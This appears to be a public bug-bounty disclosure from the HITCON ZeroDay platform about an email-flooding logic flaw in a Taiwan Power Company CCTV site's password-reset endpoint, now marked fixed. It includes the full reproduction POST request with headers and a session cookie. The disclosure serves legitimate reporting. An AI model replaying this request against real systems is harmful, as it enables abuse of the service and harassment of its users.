Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2020-01141
- 發信 Vendor: 台灣電力公司
- Title: [Bounty] 台灣電力公司
- Introduction: Email Flooding
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
已修補
-
已複測
-
公開
處理歷程
- 2020/12/20 23:08:16 : 新提交 (由 Noth 更新此狀態)
- 2020/12/20 23:10:12 : 新提交 (由 Noth 更新此狀態)
- 2020/12/20 23:12:20 : 新提交 (由 Noth 更新此狀態)
- 2020/12/20 23:15:19 : 新提交 (由 Noth 更新此狀態)
- 2020/12/20 23:49:09 : 新提交 (由 Noth 更新此狀態)
- 2020/12/21 13:27:53 : 新提交 (由 Noth 更新此狀態)
- 2020/12/21 17:16:37 : 新提交 (由 Noth 更新此狀態)
- 2020/12/24 14:25:54 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2020/12/28 17:13:34 : 複測申請中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2020/12/28 22:21:29 : 確認已修補 (由 Noth 更新此狀態)
- 2021/01/01 03:00:11 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2020-01141
- 通報者:shen (Noth)
- 風險:低
- 類型:邏輯漏洞 (Logic Flaws)
參考資料
漏洞說明: OWASP - Testing for business logic
https://www.owasp.org/index.php/Testing_for_business_logic
漏洞說明: CWE-840: Business Logic Errors
https://cwe.mitre.org/data/definitions/840.html
相關網址
敘述
Test Domain :
ccms-cctv.taipower.com.tw/
同 ZD-2020-01133 相同漏洞。
找回密碼 endpoint :
Test Image :
Post Request :
POST /ajax/ForgetPassword HTTP/1.1
Host: ccms-cctv.taipower.com.tw
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 73
Origin: https://ccms-cctv.taipower.com.tw
Connection: close
Referer: https://ccms-cctv.taipower.com.tw/login§§
Cookie: _ga=GA1.3.851989918.1607731800; _gcl_au=1.1.2108233171.1607973421; _gid=GA1.3.1218502662.1608430791; PHPSESSID=9tt09qu9n2sfiq7o1smqmeslo7
ForgetPasswordAccount=53212539&[email protected]